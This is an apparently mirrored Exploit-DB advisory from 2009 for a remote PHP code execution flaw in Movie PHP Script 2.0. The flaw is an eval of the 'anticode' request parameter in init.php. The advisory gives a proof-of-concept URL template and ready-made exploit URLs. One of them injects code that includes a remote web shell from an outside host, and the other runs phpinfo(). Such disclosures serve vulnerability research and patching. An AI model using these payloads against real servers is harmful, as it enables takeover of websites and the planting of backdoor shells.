Lucene search

K
exploitdbSirGodEDB-ID:8871
HistoryJun 03, 2009 - 12:00 a.m.

Movie PHP Script 2.0 - 'init.php?anticode' Code Execution

2009-06-0300:00:00
SirGod
www.exploit-db.com
29

AI Score

7.4

Confidence

Low

EPSS

0.016

Percentile

87.5%

#################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

[+] Remote PHP Code Execution

  - Vulnerable code in  system/services/init.php :

---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------

- PoC : 

    http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]

- Example : 

   http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";

- Example 2 :

  http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();

#################################################################################################################

# milw0rm.com [2009-06-03]

AI Score

7.4

Confidence

Low

EPSS

0.016

Percentile

87.5%

Related for EDB-ID:8871